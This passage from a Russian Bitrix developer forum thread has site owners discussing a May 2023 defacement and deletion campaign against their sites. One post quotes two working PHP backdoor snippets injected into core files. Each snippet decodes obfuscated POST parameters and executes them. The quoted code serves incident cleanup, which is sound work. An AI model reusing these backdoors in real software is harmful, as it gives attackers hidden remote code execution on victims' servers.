Разработчикам

Взломаны сайты в честь дня конституции украины

RSS

Пользователь 7284364

Заглянувший

Сообщений: 1 Регистрация: 19.05.2023

#701

19.05.2023 12:18:54

Помогите, пожалуйста, вылезает проблема с авторизацией

Удаляю этот кусок кода из bx_root.php

Цитата
Используя ДРУГУЮ уязвимость поражают \bitrix\modules\main\bx_root.php дописывая в его конец это: <? if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "") parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2])))); ?>

и вот этот из prolog.after.php

Код

define("BX_CONTROLLER_CLIENT_X", base64_decode("QlhfVE9LRU4="));
if(isset($_POST[BX_CONTROLLER_CLIENT_X]) && !empty($_POST[BX_CONTROLLER_CLIENT_X])){$APPLICATION->RestartBuffer();CControllerClient::RunCommand(hex2bin(str_rot13($_POST[BX_CONTROLLER_CLIENT_X])), 0, 0);die();}

После этого на сайт не получается авторизоваться, пишет в адресной строке https://сайт/auth/?login=yes и ничего не происходит, не выдает ошибок, все на том же окне авторизации. Если попытка войти в админку, то после "войти" черный экран фона админки и все

Если эти куски кода возвращаю - авторизация снова проходит в обычном режиме....куда еще нужно посмотреть? почему может быть такой эффект от удаления этого кода, которого изначально не было

жду помощи 🙏

Пользователь 6049485 Заглянувший Сообщений: 3 Регистрация: 28.02.2022	#702 24.05.2023 16:45:25 Добрый день! У нас взломали сайт, мы пытаемся его восстановить,может есть е кого ядро версии 20.0.650??? Очень надо или хотя бы папочку bitrix/admin/?

Пользователь 4551026

Заглянувший

Сообщений: 1 Регистрация: 31.08.2020

#703

26.05.2023 15:47:32

Добрый день! Никто сегодня не столкнулся со взломом сайта? Из симптомов - удалена папка bitrix, дефейс главной страницы с призывами от наших украинских соседей к смене власти в стране. Может быть кто-то в курсе, через какие уязвимости могли подобное осуществить?

Пользователь 162578

Заглянувший

Сообщений: 14 Регистрация: 12.02.2013

#704

26.05.2023 15:52:58

Цитата

написал:
Добрый день! Никто сегодня не столкнулся со взломом сайта? Из симптомов - удалена папка bitrix, дефейс главной страницы с призывами от наших украинских соседей к смене власти в стране. Может быть кто-то в курсе, через какие уязвимости могли подобное осуществить?

Взлом подтверждаю. Удалена папка bitrix. Пытаюсь восстановить из резервной копии

Пользователь 5517826

Посетитель

Сообщений: 69 Баллов: 9 Регистрация: 24.08.2021

#705

26.05.2023 15:56:33

Да. новая атака. Удаляют битрикс. Шаблон выносят в папку пользователя ( сама папка пустая как и содержимое ) ( на скриншоте таймвеб ). С битрикса остался только шаблон, самой системы нет. https://skr.sh/sK1uWdAQcFQ

Версия очень старая ( php 5.6 вроде на этом сайте вообще ) , на новых еще не приходили жалобы.

Рекомендую, у кого нет возможности, настроить хотя бы резервное копирование с хостинга/сервера.

Пользователь 1875791

Заглянувший

Сообщений: 9 Регистрация: 07.06.2018

#706

26.05.2023 15:59:15

Цитата

написал:
Да. новая атака. Удаляют битрикс. Шаблон выносят в папку пользователя ( сама папка пустая как и содержимое ) ( на скриншоте таймвеб ). С битрикса остался только шаблон, самой системы нет. https://skr.sh/sK1uWdAQcFQ

Версия очень старая ( php 5.6 вроде на этом сайте вообще ) , на новых еще не приходили жалобы.

Рекомендую, у кого нет возможности, настроить хотя бы резервное копирование с хостинга/сервера.

Какая версия битрикса? У вас точно не outdated? Что показывает security_scanner при после сканирования (покажите вывод)?

Пользователь 5517826 Посетитель Сообщений: 69 Баллов: 9 Регистрация: 24.08.2021	#707 26.05.2023 16:09:50 Да я восстановил уже, это не проблема. Он очень старый https://skr.sh/sK1qVJTAuts https://skr.sh/sK1232ar1Xj

Пользователь 2352755 Заглянувший Сообщений: 3 Регистрация: 01.08.2018	#708 26.05.2023 17:11:22 У нас у клиента тоже самое. Только php 8 и ядро последнее.

Пользователь 7180340

Заглянувший

Сообщений: 6 Регистрация: 04.04.2023

REMADMIN

#709

26.05.2023 18:22:34

Тоже сегодня получил инфу о таком взломе.
Знаю, что версия Битрикса последняя. Но к сожалению у меня нет доступа ни к админке, ни к файлам, ни к логам. А логи изучить было бы очень интересно...

Удалённый системный администратор

Пользователь 6510870 Посетитель Сообщений: 3 Баллов: 5 Регистрация: 12.08.2022	#710 26.05.2023 18:47:12 Набросал статью с разбором сегодняшней атаки https://telegra.ph/hck-bx-0526-05-26

Пользователь 133595 Постоянный посетитель Сообщений: 94 Баллов: 15 Регистрация: 04.07.2012	#711 26.05.2023 19:07:19 А есть инфа о новом эксполите?

Пользователь 7302476 Заглянувший Сообщений: 1 Регистрация: 26.05.2023	#712 26.05.2023 19:11:11 Закрыть post запросы к определенные файлам?

Пользователь 7295616

Заглянувший

Сообщений: 1 Регистрация: 26.05.2023

#713

26.05.2023 19:15:17

Цитата
написал: Набросал статью с разбором сегодняшней атаки https://telegra.ph/hck-bx-0526-05-26

У меня эти файлики чистенькие (

Пользователь 6510870

Посетитель

Сообщений: 3 Баллов: 5 Регистрация: 12.08.2022

#714

26.05.2023 19:44:30

Как уже неоднократно писали в этой теме, то вот одни из файлов, которые могу быть подвержены эксплоиту

bitrix/modules/main/bx_root.php
bitrix/modules/main/include/prolog_after.php
bitrix/modules/fileman/admin/fileman_html_editor_action.php
(...)

Можно дополнить этот список, чтобы другим людям не приходилось искать заново.
Были такие сайты, где просто нереально обновить ядро Битрикса и приходится фиксить вручную

Так же помогает модуль marketplace.1c-bitrix.ru/bitrix.xscan с поиском зараженных файлов. На некоторых сайтах он системные файлы тоже помечал как подозрительные, но в некоторых на самом деле всё в порядке.

Пользователь 99803 Заглянувший Сообщений: 7 Регистрация: 28.09.2011	#715 27.05.2023 00:17:13 ...

Пользователь 52311

Заглянувший

Сообщений: 3 Регистрация: 12.11.2009

#716

27.05.2023 15:02:01

Тоже сегодня поймали на одном из сайтов "Мы IT Армия Украины! Ваши личные данные слиты в сеть!" и далее по тексту. Накатил бэкап, сменил пароли админов, почистил то что нашел marketplace.1c-bitrix.ru/bitrix.xscan, вроде пока все нормально. Но блин непонятно как эта зараза вообще попала к нам. Сайт только неделю назад вместе со всеми модулями полностью обновили до последней версии, плюс перевели на php 8.1. И тут такое =( И зачем тогда все эти обновления?

Объясните кто знает, как правильно защититься от этого бреда в будущем? И почему блин владельцы и разрабы битрикса, беря с нас кучу денег за лицензию, не могут сделать защиту хотя бы от всяких элементарных eval-лов и создания совершенно левых файлов в системных каталогах? Ну можно же какую-то проверку целостности запилить, встроенный сканер какой-то с предупреждениями заранее и тд =(

Пользователь 515353

Заглянувший

Сообщений: 22 Баллов: 2 Регистрация: 04.03.2016

#717

27.05.2023 15:37:33

Цитата
написал: Сайт только неделю назад вместе со всеми модулями полностью обновили до последней версии, плюс перевели на php 8.1. И тут такое =( И зачем тогда все эти обновления?

1. У вас на сервере только этот сайт был? Т. е. исключена возможность взлома через другой сайт?
2. Взломать могли и через код публичной части сайта, за который отвечаете вы, а не Битрикс. Сканер безопасности проактивной защиты и проверку системы запускали после установки всех обновлений? Там было всё в порядке?
Если ответы на оба вопроса положительные, то обращайтесь в техподдержку Битрикса. Пишите сюда, если появится новая информация.

Создание и поддержка сайтов: https://evgenydonich.ru

Пользователь 108671

Постоянный посетитель

Сообщений: 139 Баллов: 23 Регистрация: 25.11.2011

#718

27.05.2023 15:43:02

Цитата

написал:
Тоже сегодня поймали на одном из сайтов "Мы IT Армия Украины! Ваши личные данные слиты в сеть!" и далее по тексту. Накатил бэкап, сменил пароли админов, почистил то что нашел marketplace.1c-bitrix.ru/bitrix.xscan , вроде пока все нормально. Но блин непонятно как эта зараза вообще попала к нам. Сайт только неделю назад вместе со всеми модулями полностью обновили до последней версии, плюс перевели на php 8.1. И тут такое =( И зачем тогда все эти обновления?

Объясните кто знает, как правильно защититься от этого бреда в будущем? И почему блин владельцы и разрабы битрикса, беря с нас кучу денег за лицензию, не могут сделать защиту хотя бы от всяких элементарных eval-лов и создания совершенно левых файлов в системных каталогах? Ну можно же какую-то проверку целостности запилить, встроенный сканер какой-то с предупреждениями заранее и тд =(

В поддержку писали?
Пишите, напишите сюда ответ.
Мне помогли, больше проблем нет.
Если все обновили, а проблема остается, значит остался скрипт. Уже в этой ветки писали, как решить проблему.

Пользователь 52311

Заглянувший

Сообщений: 3 Регистрация: 12.11.2009

#719

27.05.2023 21:45:23

Цитата

написал:

Цитата
написал: Сайт только неделю назад вместе со всеми модулями полностью обновили до последней версии, плюс перевели на php 8.1. И тут такое =( И зачем тогда все эти обновления?

1. На сервере пять битрикс сайтов, но дефейснули только на одном. Два на одной админке, еще три на другой. Все фул обновленные, с пхп 8.1, вот только недавно обновили. Не-битриксовских сайтов на сервере нет.
2. Ну теоретически да, это понятно. Хотя какая разница, взламывают через стороннее решение или фронт - система тоже должна это видеть по хорошему и хотя бы оповещать о подозрительных активностях. Сканер безопасности и проверку сайта после обновлений запускали да, там ничего серьезного не было, только ворчание про включенный дебаггинг.

Пользователь 52311

Заглянувший

Сообщений: 3 Регистрация: 12.11.2009

#720

27.05.2023 21:46:36

Цитата

написал:

Цитата
написал: Тоже сегодня поймали на одном из сайтов "Мы IT Армия...

Ну на данный момент мы тоже вроде все решили, да. В поддержку не обращались. А что вам там ответили, какие инструкции/советы написали?

Пользователь 108671

Постоянный посетитель

Сообщений: 139 Баллов: 23 Регистрация: 25.11.2011

#721

28.05.2023 08:37:44

Цитата

написал:

Цитата

написал:

Цитата
написал: Тоже сегодня поймали на одном из сайтов "Мы IT Армия...

В поддержку надо было обратиться обязательно. У вас все обновлено, и вам в первую очередь туда - денег за это не берут.
У меня была история с сайтом с просроченной лицензией.
Поддержка попросила доступ, сами все почистили, указали, какие файл исправили, что удалили. Порекомендовали обновить сайт.
Какие файлы? Все тоже самое, что здесь и обсуждалось.

Прикрепленные файлы

virus.png (41.16 КБ)

Пользователь 215140

Заглянувший

Сообщений: 23 Баллов: 2 Регистрация: 06.09.2013

#722

28.05.2023 11:03:59

Добрый день!

Такая же история.

В добавок к этому оказались заблокированы интернет провайдерами домены, но только на 443-м порту и только главное зеркало. Причем также оказались заблокированы по https даже домены которые работали только по http. По https главное зеркало открывается только через VPN. В реестре заблокированных сайтов ничего не находит. Смена IP-адреса сайта не помогла. Причем если главное зеркало к примеру без www, то с www через https все работает. На 80-м порту работают оба, как с www так и без www.

Может кто сталкивался? И какие действия предпринять для разблокировки?

Пользователь 108671

Постоянный посетитель

Сообщений: 139 Баллов: 23 Регистрация: 25.11.2011

#723

28.05.2023 13:24:40

Цитата

написал:
Добрый день!

Такая же история.

В добавок к этому оказались заблокированы интернет провайдерами домены, но только на 443-м порту и только главное зеркало. Причем также оказались заблокированы по https даже домены которые работали только по http. По https главное зеркало открывается только через VPN. В реестре заблокированных сайтов ничего не находит. Смена IP-адреса сайта не помогла. Причем если главное зеркало к примеру без www, то с www через https все работает. На 80-м порту работают оба, как с www так и без www.

Может кто сталкивался? И какие действия предпринять для разблокировки?

Провайдер если блокирует, то объясняет причину. Устраняете причину, провайдер разблокирует. Возможные причины: устанавливается сервер рассылки спама, через ваш сайт с вашего ip атакуются другие сайты: взлом, дос атака, подбор паролей.

Пользователь 215140

Заглянувший

Сообщений: 23 Баллов: 2 Регистрация: 06.09.2013

#724

28.05.2023 21:21:58

Цитата

написал:

Цитата

От провайдеров никаких объяснений не было. Я предполагаю, что блокировка была автоматической со стороны РКН по причине взлома сайтов хакерами соседнего государства и размещения на них некорректного обращения, о котором идет речь выше в других постах.

Может кто подскажет, какие действия предпринять для разблокировки? Или разблокировка может произойти так же автоматически через некоторое время?

Пользователь 49681 Посетитель Сообщений: 29 Баллов: 7 Регистрация: 29.09.2009	#725 29.05.2023 02:53:51 да-да, тоже такая же фигня с vpn доступом

Взломаны сайты в честь дня конституции украины

Продукты

Управление сайтом

Битрикс24

Интернет-магазин + CRM

Решения

Для интернет-магазинов

Каталог готовых решений

Внедрение

Выбрать партнера

Проверить партнера

Стать партнером